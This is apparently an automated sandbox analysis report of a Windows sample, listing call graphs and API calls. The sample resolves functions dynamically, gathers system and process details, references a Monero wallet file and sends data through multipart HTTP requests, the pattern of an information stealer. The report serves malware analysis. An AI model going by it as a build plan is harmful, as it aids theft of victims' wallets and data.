13a9b0 4 API calls 14909->14910 14911 1321cc 14910->14911 14912 13a8a0 lstrcpy 14911->14912 14913 1321d5 14912->14913 14914 13a9b0 4 API calls 14913->14914 14915 1321f6 14914->14915 14916 13a8a0 lstrcpy 14915->14916 14917 1321ff 14916->14917 15504 137ed0 GetSystemInfo wsprintfA 14917->15504 14920 13a9b0 4 API calls 14921 13221f 14920->14921 14922 13a8a0 lstrcpy 14921->14922 14923 132228 14922->14923 14924 13a9b0 4 API calls 14923->14924 14925 132247 14924->14925 14926 13a8a0 lstrcpy 14925->14926 14927 132250 14926->14927 14928 13a9b0 4 API calls 14927->14928 14929 132270 14928->14929 14930 13a8a0 lstrcpy 14929->14930 14931 132279 14930->14931 15506 138100 GetProcessHeap RtlAllocateHeap 14931->15506 14934 13a9b0 4 API calls 14935 
132299 14934->14935 14936 13a8a0 lstrcpy 14935->14936 14937 1322a2 14936->14937 14938 13a9b0 4 API calls 14937->14938 14939 1322c1 14938->14939 14940 13a8a0 lstrcpy 14939->14940 14941 1322ca 14940->14941 14942 13a9b0 4 API calls 14941->14942 14943 1322eb 14942->14943 14944 13a8a0 lstrcpy 14943->14944 14945 1322f4 14944->14945 15512 1387c0 14945->15512 14948 13a920 3 API calls 14949 13231e 14948->14949 14950 13a8a0 lstrcpy 14949->14950 14951 132327 14950->14951 14952 13a9b0 4 API calls 14951->14952 14953 132351 14952->14953 14954 13a8a0 lstrcpy 14953->14954 14955 13235a 14954->14955 14956 13a9b0 4 API calls 14955->14956 14957 13237a 14956->14957 14958 13a8a0 lstrcpy 14957->14958 14959 132383 14958->14959 14960 13a9b0 4 API calls 14959->14960 14961 1323a2 14960->14961 14962 13a8a0 lstrcpy 14961->14962 14963 1323ab 14962->14963 15517 1381f0 14963->15517 14965 1323c2 14966 13a920 3 API calls 14965->14966 14967 1323d5 14966->14967 14968 13a8a0 lstrcpy 14967->14968 14969 1323de 14968->14969 14970 13a9b0 4 API calls 14969->14970 14971 13240a 14970->14971 14972 13a8a0 lstrcpy 14971->14972 14973 132413 14972->14973 14974 13a9b0 4 API calls 14973->14974 14975 132432 14974->14975 14976 13a8a0 lstrcpy 14975->14976 14977 13243b 14976->14977 14978 13a9b0 4 API calls 14977->14978 14979 13245c 14978->14979 14980 13a8a0 lstrcpy 14979->14980 14981 132465 14980->14981 14982 13a9b0 4 API calls 14981->14982 14983 132484 14982->14983 14984 13a8a0 lstrcpy 14983->14984 14985 13248d 14984->14985 14986 13a9b0 4 API calls 14985->14986 14987 1324ae 14986->14987 14988 13a8a0 lstrcpy 14987->14988 14989 1324b7 14988->14989 15525 138320 14989->15525 14991 1324d3 14992 13a920 3 API calls 14991->14992 14993 1324e6 14992->14993 14994 13a8a0 lstrcpy 14993->14994 14995 1324ef 14994->14995 14996 13a9b0 4 API calls 14995->14996 14997 132519 14996->14997 14998 13a8a0 lstrcpy 14997->14998 14999 132522 14998->14999 15000 13a9b0 4 API calls 14999->15000 15001 132543 15000->15001 15002 13a8a0 lstrcpy 
15001->15002 15003 13254c 15002->15003 15004 138320 17 API calls 15003->15004 15005 132568 15004->15005 15006 13a920 3 API calls 15005->15006 15007 13257b 15006->15007 15008 13a8a0 lstrcpy 15007->15008 15009 132584 15008->15009 15010 13a9b0 4 API calls 15009->15010 15011 1325ae 15010->15011 15012 13a8a0 lstrcpy 15011->15012 15013 1325b7 15012->15013 15014 13a9b0 4 API calls 15013->15014 15015 1325d6 15014->15015 15016 13a8a0 lstrcpy 15015->15016 15017 1325df 15016->15017 15018 13a9b0 4 API calls 15017->15018 15019 132600 15018->15019 15020 13a8a0 lstrcpy 15019->15020 15021 132609 15020->15021 15561 138680 15021->15561 15023 132620 15024 13a920 3 API calls 15023->15024 15025 132633 15024->15025 15026 13a8a0 lstrcpy 15025->15026 15027 13263c 15026->15027 15028 13265a lstrlen 15027->15028 15029 13266a 15028->15029 15030 13a740 lstrcpy 15029->15030 15031 13267c 15030->15031 15032 121590 lstrcpy 15031->15032 15033 13268d 15032->15033 15571 135190 15033->15571 15035 132699 15035->13467 15037 13aad0 15036->15037 15038 125009 InternetOpenUrlA 15037->15038 15042 125021 15038->15042 15039 1250a0 InternetCloseHandle InternetCloseHandle 15041 1250ec 15039->15041 15040 12502a InternetReadFile 15040->15042 15041->13471 15042->15039 15042->15040 15756 1298d0 15043->15756 15045 130759 15046 130a38 15045->15046 15047 13077d 15045->15047 15048 121590 lstrcpy 15046->15048 15050 130799 StrCmpCA 15047->15050 15049 130a49 15048->15049 15932 130250 15049->15932 15051 1307a8 15050->15051 15079 130843 15050->15079 15053 13a7a0 lstrcpy 15051->15053 15054 1307c3 15053->15054 15056 121590 lstrcpy 15054->15056 15055 130865 StrCmpCA 15057 130874 15055->15057 15095 13096b 15055->15095 15059 13080c 15056->15059 15060 13a740 lstrcpy 15057->15060 15062 13a7a0 lstrcpy 15059->15062 15061 130881 15060->15061 15064 13a9b0 4 API calls 15061->15064 15065 130823 15062->15065 15063 13099c StrCmpCA 15066 130a2d 15063->15066 15067 1309ab 15063->15067 15069 1308ac 15064->15069 15070 13a7a0 lstrcpy 
15065->15070 15066->13475 15068 121590 lstrcpy 15067->15068 15071 1309f4 15068->15071 15072 13a920 3 API calls 15069->15072 15073 13083e 15070->15073 15074 13a7a0 lstrcpy 15071->15074 15075 1308b3 15072->15075 15759 12fb00 15073->15759 15077 130a0d 15074->15077 15078 13a9b0 4 API calls 15075->15078 15080 13a7a0 lstrcpy 15077->15080 15081 1308ba 15078->15081 15079->15055 15082 130a28 15080->15082 15095->15063 15415 13a7a0 lstrcpy 15414->15415 15416 121683 15415->15416 15417 13a7a0 lstrcpy 15416->15417 15418 121695 15417->15418 15419 13a7a0 lstrcpy 15418->15419 15420 1216a7 15419->15420 15421 13a7a0 lstrcpy 15420->15421 15422 1215a3 15421->15422 15422->14298 15424 1247c6 15423->15424 15425 124838 lstrlen 15424->15425 15426 13aad0 15425->15426 15427 124848 InternetCrackUrlA 15426->15427 15428 124867 15427->15428 15428->14375 15430 13a740 lstrcpy 15429->15430 15431 138b74 15430->15431 15432 13a740 lstrcpy 15431->15432 15433 138b82 GetSystemTime 15432->15433 15435 138b99 15433->15435 15434 13a7a0 lstrcpy 15436 138bfc 15434->15436 15435->15434 15436->14390 15438 13a931 15437->15438 15439 13a988 15438->15439 15441 13a968 lstrcpy lstrcat 15438->15441 15440 13a7a0 lstrcpy 15439->15440 15442 13a994 15440->15442 15441->15439 15442->14394 15444 124e13 HttpSendRequestA 15443->15444 15444->14509 15446 124eee 15445->15446 15447 129af9 LocalAlloc 15445->15447 15446->14396 15446->14399 15447->15446 15448 129b14 CryptStringToBinaryA 15447->15448 15448->15446 15449 129b39 LocalFree 15448->15449 15449->15446 15578 1377a0 15450->15578 15453 1376c6 RegOpenKeyExA 15455 1376e7 RegQueryValueExA 15453->15455 15456 137704 RegCloseKey 15453->15456 15454 131c1e 15454->14751 15455->15456 15456->15454 15458 131c99 15457->15458 15458->14765 15460 131e09 15459->15460 15460->14807 15462 131e84 15461->15462 15463 137a9a wsprintfA 15461->15463 15462->14821 15463->15462 15465 131efe 15464->15465 15466 137b4d 15464->15466 15465->14835 15585 138d20 LocalAlloc CharToOemW 15466->15585 15469 13a740 lstrcpy 
15468->15469 15470 137bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15469->15470 15479 137c25 15470->15479 15471 137c46 GetLocaleInfoA 15471->15479 15472 137d18 15473 137d28 15472->15473 15474 137d1e LocalFree 15472->15474 15476 13a7a0 lstrcpy 15473->15476 15474->15473 15475 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15475->15479 15478 137d37 15476->15478 15477 13a8a0 lstrcpy 15477->15479 15478->14848 15479->15471 15479->15472 15479->15475 15479->15477 15481 132008 15480->15481 15481->14863 15483 139493 GetModuleFileNameExA CloseHandle 15482->15483 15484 1394b5 15482->15484 15483->15484 15485 13a740 lstrcpy 15484->15485 15486 132091 15485->15486 15486->14878 15488 132119 15487->15488 15489 137e68 RegQueryValueExA 15487->15489 15488->14892 15490 137e8e RegCloseKey 15489->15490 15490->15488 15492 137fb9 GetLogicalProcessorInformationEx 15491->15492 15493 137fd8 GetLastError 15492->15493 15498 138029 15492->15498 15501 138022 15493->15501 15503 137fe3 15493->15503 15494 132194 15494->14906 15497 1389f0 2 API calls 15497->15494 15499 1389f0 2 API calls 15498->15499 15500 13807b 15499->15500 15500->15501 15502 138084 wsprintfA 15500->15502 15501->15494 15501->15497 15502->15494 15503->15492 15503->15494 15586 1389f0 15503->15586 15589 138a10 GetProcessHeap RtlAllocateHeap 15503->15589 15505 13220f 15504->15505 15505->14920 15507 1389b0 15506->15507 15508 13814d GlobalMemoryStatusEx 15507->15508 15511 138163 15508->15511 15509 13819b wsprintfA 15510 132289 15509->15510 15510->14934 15511->15509 15513 1387fb GetProcessHeap RtlAllocateHeap wsprintfA 15512->15513 15515 13a740 lstrcpy 15513->15515 15516 13230b 15515->15516 15516->14948 15518 13a740 lstrcpy 15517->15518 15522 138229 15518->15522 15519 138263 15521 13a7a0 lstrcpy 15519->15521 15520 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15520->15522 15523 1382dc 15521->15523 15522->15519 15522->15520 15524 13a8a0 lstrcpy 15522->15524 15523->14965 15524->15522 15526 13a740 lstrcpy 15525->15526 15527 13835c 
RegOpenKeyExA 15526->15527 15528 1383d0 15527->15528 15529 1383ae 15527->15529 15531 138613 RegCloseKey 15528->15531 15532 1383f8 RegEnumKeyExA 15528->15532 15530 13a7a0 lstrcpy 15529->15530 15541 1383bd 15530->15541 15535 13a7a0 lstrcpy 15531->15535 15533 13843f wsprintfA RegOpenKeyExA 15532->15533 15534 13860e 15532->15534 15536 1384c1 RegQueryValueExA 15533->15536 15537 138485 RegCloseKey RegCloseKey 15533->15537 15534->15531 15535->15541 15539 138601 RegCloseKey 15536->15539 15540 1384fa lstrlen 15536->15540 15538 13a7a0 lstrcpy 15537->15538 15538->15541 15539->15534 15540->15539 15542 138510 15540->15542 15541->14991 15543 13a9b0 4 API calls 15542->15543 15544 138527 15543->15544 15545 13a8a0 lstrcpy 15544->15545 15546 138533 15545->15546 15547 13a9b0 4 API calls 15546->15547 15548 138557 15547->15548 15549 13a8a0 lstrcpy 15548->15549 15550 138563 15549->15550 15551 13856e RegQueryValueExA 15550->15551 15551->15539 15552 1385a3 15551->15552 15553 13a9b0 4 API calls 15552->15553 15554 1385ba 15553->15554 15555 13a8a0 lstrcpy 15554->15555 15556 1385c6 15555->15556 15557 13a9b0 4 API calls 15556->15557 15558 1385ea 15557->15558 15559 13a8a0 lstrcpy 15558->15559 15560 1385f6 15559->15560 15560->15539 15562 13a740 lstrcpy 15561->15562 15563 1386bc CreateToolhelp32Snapshot Process32First 15562->15563 15564 1386e8 Process32Next 15563->15564 15565 13875d CloseHandle 15563->15565 15564->15565 15570 1386fd 15564->15570 15566 13a7a0 lstrcpy 15565->15566 15568 138776 15566->15568 15567 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15567->15570 15568->15023 15569 13a8a0 lstrcpy 15569->15570 15570->15564 15570->15567 15570->15569 15572 13a7a0 lstrcpy 15571->15572 15573 1351b5 15572->15573 15574 121590 lstrcpy 15573->15574 15575 1351c6 15574->15575 15590 125100 15575->15590 15577 1351cf 15577->15035 15581 137720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15578->15581 15580 1376b9 15580->15453 15580->15454 15582 137780 RegCloseKey 15581->15582 15583 137765 RegQueryValueExA 
15581->15583 15584 137793 15582->15584 15583->15582 15584->15580 15585->15465 15587 1389f9 GetProcessHeap HeapFree 15586->15587 15588 138a0c 15586->15588 15587->15588 15588->15503 15589->15503 15591 13a7a0 lstrcpy 15590->15591 15592 125119 15591->15592 15593 1247b0 2 API calls 15592->15593 15594 125125 15593->15594 15750 138ea0 15594->15750 15596 125184 15597 125192 lstrlen 15596->15597 15598 1251a5 15597->15598 15599 138ea0 4 API calls 15598->15599 15600 1251b6 15599->15600 15601 13a740 lstrcpy 15600->15601 15602 1251c9 15601->15602 15603 13a740 lstrcpy 15602->15603 15604 1251d6 15603->15604 15605 13a740 lstrcpy 15604->15605 15606 1251e3 15605->15606 15607 13a740 lstrcpy 15606->15607 15608 1251f0 15607->15608 15609 13a740 lstrcpy 15608->15609 15610 1251fd InternetOpenA StrCmpCA 15609->15610 15611 12522f 15610->15611 15612 1258c4 InternetCloseHandle 15611->15612 15613 138b60 3 API calls 15611->15613 15619 1258d9 ctype 15612->15619 15614 12524e 15613->15614 15615 13a920 3 API calls 15614->15615 15616 125261 15615->15616 15617 13a8a0 lstrcpy 15616->15617 15618 12526a 15617->15618 15620 13a9b0 4 API calls 15618->15620 15622 13a7a0 lstrcpy 15619->15622 15621 1252ab 15620->15621 15623 13a920 3 API calls 15621->15623 15631 125913 15622->15631 15624 1252b2 15623->15624 15625 13a9b0 4 API calls 15624->15625 15626 1252b9 15625->15626 15627 13a8a0 lstrcpy 15626->15627 15628 1252c2 15627->15628 15629 13a9b0 4 API calls 15628->15629 15630 125303 15629->15630 15632 13a920 3 API calls 15630->15632 15631->15577 15633 12530a 15632->15633 15634 13a8a0 lstrcpy 15633->15634 15635 125313 15634->15635 15636 125329 InternetConnectA 15635->15636 15636->15612 15637 125359 HttpOpenRequestA 15636->15637 15639 1258b7 InternetCloseHandle 15637->15639 15640 1253b7 15637->15640 15639->15612 15641 13a9b0 4 API calls 15640->15641 15642 1253cb 15641->15642 15643 13a8a0 lstrcpy 15642->15643 15644 1253d4 15643->15644 15645 13a920 3 API calls 15644->15645 15646 1253f2 15645->15646 15647 13a8a0 
lstrcpy 15646->15647 15648 1253fb 15647->15648 15649 13a9b0 4 API calls 15648->15649 15650 12541a 15649->15650 15651 13a8a0 lstrcpy 15650->15651 15652 125423 15651->15652 15653 13a9b0 4 API calls 15652->15653 15654 125444 15653->15654 15655 13a8a0 lstrcpy 15654->15655 15656 12544d 15655->15656 15657 13a9b0 4 API calls 15656->15657 15658 12546e 15657->15658 15751 138ea9 15750->15751 15752 138ead CryptBinaryToStringA 15750->15752 15751->15596 15752->15751 15753 138ece GetProcessHeap RtlAllocateHeap 15752->15753 15753->15751 15754 138ef4 ctype 15753->15754 15755 138f05 CryptBinaryToStringA 15754->15755 15755->15751 15998 129880 15756->15998 15758 1298e1 15758->15045 15760 13a740 lstrcpy 15759->15760 15761 12fb16 15760->15761 15933 13a740 lstrcpy 15932->15933 15934 130266 15933->15934 15935 138de0 2 API calls 15934->15935 15936 13027b 15935->15936 15937 13a920 3 API calls 15936->15937 15938 13028b 15937->15938 15939 13a8a0 lstrcpy 15938->15939 15940 130294 15939->15940 15941 13a9b0 4 API calls 15940->15941 15942 1302b8 15941->15942 15999 12988e 15998->15999 16002 126fb0 15999->16002 16001 1298ad ctype 16001->15758 16005 126d40 16002->16005 16006 126d63 16005->16006 16016 126d59 16005->16016 16021 126530 16006->16021 16010 126dbe 16010->16016 16031 1269b0 16010->16031 16012 126e2a 16013 126ee6 VirtualFree 16012->16013 16015 126ef7 16012->16015 16012->16016 16013->16015 16014 126f41 16014->16016 16019 1389f0 2 API calls 16014->16019 16015->16014 16017 126f26 FreeLibrary 16015->16017 16018 126f38 16015->16018 16016->16001 16017->16015 16020 1389f0 2 API calls 16018->16020 16019->16016 16020->16014 16022 126542 16021->16022 16024 126549 16022->16024 16041 138a10 GetProcessHeap RtlAllocateHeap 16022->16041 16024->16016 16025 126660 16024->16025 16028 12668f VirtualAlloc 16025->16028 16027 126730 16029 126743 VirtualAlloc 16027->16029 16030 12673c 16027->16030 16028->16027 16028->16030 16029->16030 16030->16010 16032 1269c9 16031->16032 16036 1269d5 16031->16036 16033 126a09 
LoadLibraryA 16032->16033 16032->16036 16034 126a32 16033->16034 16033->16036 16040 126ae0 16034->16040 16042 138a10 GetProcessHeap RtlAllocateHeap 16034->16042 16036->16012 16037 126ba8 GetProcAddress 16037->16036 16037->16040 16038 1389f0 2 API calls 16038->16040 16039 126a8b 16039->16036 16039->16038 16040->16036 16040->16037 16041->16024 16042->16039

                          Control-flow Graph

                          control_flow_graph 660 139860-139874 call 139750 663 139a93-139af2 LoadLibraryA * 5 660->663 664 13987a-139a8e call 139780 GetProcAddress * 21 660->664 665 139af4-139b08 GetProcAddress 663->665 666 139b0d-139b14 663->666 664->663 665->666 668 139b46-139b4d 666->668 669 139b16-139b41 GetProcAddress * 2 666->669 671 139b68-139b6f 668->671 672 139b4f-139b63 GetProcAddress 668->672 669->668 673 139b71-139b84 GetProcAddress 671->673 674 139b89-139b90 671->674 672->671 673->674 675 139b92-139bbc GetProcAddress * 2 674->675 676 139bc1-139bc2 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00F01540), ref: 001398A1
                          • GetProcAddress.KERNEL32(76210000,00F01420), ref: 001398BA
                          • GetProcAddress.KERNEL32(76210000,00F01450), ref: 001398D2
                          • GetProcAddress.KERNEL32(76210000,00F01438), ref: 001398EA
                          • GetProcAddress.KERNEL32(76210000,00F014B0), ref: 00139903
                          • GetProcAddress.KERNEL32(76210000,00F099B8), ref: 0013991B
                          • GetProcAddress.KERNEL32(76210000,00EF5730), ref: 00139933
                          • GetProcAddress.KERNEL32(76210000,00EF57F0), ref: 0013994C
                          • GetProcAddress.KERNEL32(76210000,00F01558), ref: 00139964
                          • GetProcAddress.KERNEL32(76210000,00F01480), ref: 0013997C
                          • GetProcAddress.KERNEL32(76210000,00F015A0), ref: 00139995
                          • GetProcAddress.KERNEL32(76210000,00F01498), ref: 001399AD
                          • GetProcAddress.KERNEL32(76210000,00EF5AB0), ref: 001399C5
                          • GetProcAddress.KERNEL32(76210000,00F01600), ref: 001399DE
                          • GetProcAddress.KERNEL32(76210000,00F014C8), ref: 001399F6
                          • GetProcAddress.KERNEL32(76210000,00EF5AD0), ref: 00139A0E
                          • GetProcAddress.KERNEL32(76210000,00F01570), ref: 00139A27
                          • GetProcAddress.KERNEL32(76210000,00F01618), ref: 00139A3F
                          • GetProcAddress.KERNEL32(76210000,00EF5830), ref: 00139A57
                          • GetProcAddress.KERNEL32(76210000,00F01690), ref: 00139A70
                          • GetProcAddress.KERNEL32(76210000,00EF56F0), ref: 00139A88
                          • LoadLibraryA.KERNEL32(00F01708,?,00136A00), ref: 00139A9A
                          • LoadLibraryA.KERNEL32(00F016A8,?,00136A00), ref: 00139AAB
                          • LoadLibraryA.KERNEL32(00F016C0,?,00136A00), ref: 00139ABD
                          • LoadLibraryA.KERNEL32(00F016D8,?,00136A00), ref: 00139ACF
                          • LoadLibraryA.KERNEL32(00F016F0,?,00136A00), ref: 00139AE0
                          • GetProcAddress.KERNEL32(75B30000,00F01720), ref: 00139B02
                          • GetProcAddress.KERNEL32(751E0000,00F01660), ref: 00139B23
                          • GetProcAddress.KERNEL32(751E0000,00F01678), ref: 00139B3B
                          • GetProcAddress.KERNEL32(76910000,00F09ED8), ref: 00139B5D
                          • GetProcAddress.KERNEL32(75670000,00EF5A50), ref: 00139B7E
                          • GetProcAddress.KERNEL32(77310000,00F09A78), ref: 00139B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00139BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 0W$0X$NtQueryInformationProcess$PZ
                          • API String ID: 2238633743-3542321927
                          • Opcode ID: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                          • Instruction ID: 614679c99423c9862a666fad4b6f31916b63a8d8283405dfd32c011538b07139
                          • Opcode Fuzzy Hash: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                          • Instruction Fuzzy Hash: 02A15BB5500A409FD346EFA8EE889563BFDF78C301F04C51AE615A3264D7F9A841EF22

                          Control-flow Graph

                          control_flow_graph 764 1245c0-124695 RtlAllocateHeap 781 1246a0-1246a6 764->781 782 12474f-1247a9 VirtualProtect 781->782 783 1246ac-12474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0012460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0012479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (28 references to the same string): 001245C7, 001245D2, 001245DD, 001245E8, 001245F3, 00124617, 00124622, 0012462D, 00124643, 00124657, 00124662, 0012466D, 00124678, 00124683, 001246B7, 001246C2, 001246CD, 001246D8, 00124713, 0012471E, 00124729, 00124734, 0012473F, 0012474F, 0012475A, 00124765, 00124770, 0012477B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated 30 times, $-separated)
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 06862ecdb7568f373b31deba42b2292a22309125b759e709bd0f0cdd7dd05822
                          • Instruction ID: edbaebadb7c2b9bb81da8238907b1aee1b8cdec7f550f1ee9ca0e796e684db48
                          • Opcode Fuzzy Hash: 06862ecdb7568f373b31deba42b2292a22309125b759e709bd0f0cdd7dd05822
                          • Instruction Fuzzy Hash: AA41FF607C36047BE73ABFA4A852F9D76E7DF46B88F509054B804972D2CBB0A5808537

                          Control-flow Graph
                          control_flow_graph (one basic block per line: id, address range, calls -> successors)
                          • 801 124880-124942: call 13a7a0 call 1247b0 call 13a740 * 5 InternetOpenA StrCmpCA -> 816, 817
                          • 816 124944 -> 817
                          • 817 12494b-12494f -> 818, 819
                          • 818 124955-124acd: call 138b60 call 13a920 call 13a8a0 call 13a800 * 2 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a920 call 13a8a0 call 13a800 * 2 InternetConnectA -> 819, 905
                          • 819 124ecb-124ef3: InternetCloseHandle call 13aad0 call 129ac0 -> 829, 830
                          • 829 124f32-124fa2: call 138990 * 2 call 13a7a0 call 13a800 * 8 -> (no successors)
                          • 830 124ef5-124f2d: call 13a820 call 13a9b0 call 13a8a0 call 13a800 -> 829
                          • 905 124ad3-124ad7 -> 906, 907
                          • 906 124ae5 -> 908
                          • 907 124ad9-124ae3 -> 908
                          • 908 124aef-124b22: HttpOpenRequestA -> 909, 910
                          • 909 124b28-124e28: call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a740 call 13a920 * 2 call 13a8a0 call 13a800 * 2 call 13aad0 lstrlen call 13aad0 * 2 lstrlen call 13aad0 HttpSendRequestA -> 1021
                          • 910 124ebe-124ec5: InternetCloseHandle -> 819
                          • 1021 124e32-124e5c: InternetReadFile -> 1022, 1023
                          • 1022 124e67-124eb9: InternetCloseHandle call 13a800 -> 910
                          • 1023 124e5e-124e65 -> 1022, 1024
                          • 1024 124e69-124ea7: call 13a9b0 call 13a8a0 call 13a800 -> 1021
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124915
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 0012493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00124ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00140DDB,00000000,?,?,00000000,?,",00000000,?,00F0F8F0), ref: 00124DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00124E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00124E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00124E49
                          • InternetCloseHandle.WININET(00000000), ref: 00124EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00124EC5
                          • HttpOpenRequestA.WININET(00000000,00F0F8B0,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00124B15
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • InternetCloseHandle.WININET(00000000), ref: 00124ECF
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                          • Instruction ID: c767a06c44d1aca1c2d499cf6dbd1a979ddda38f64ee0ba0d002a7938dd03842
                          • Opcode Fuzzy Hash: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
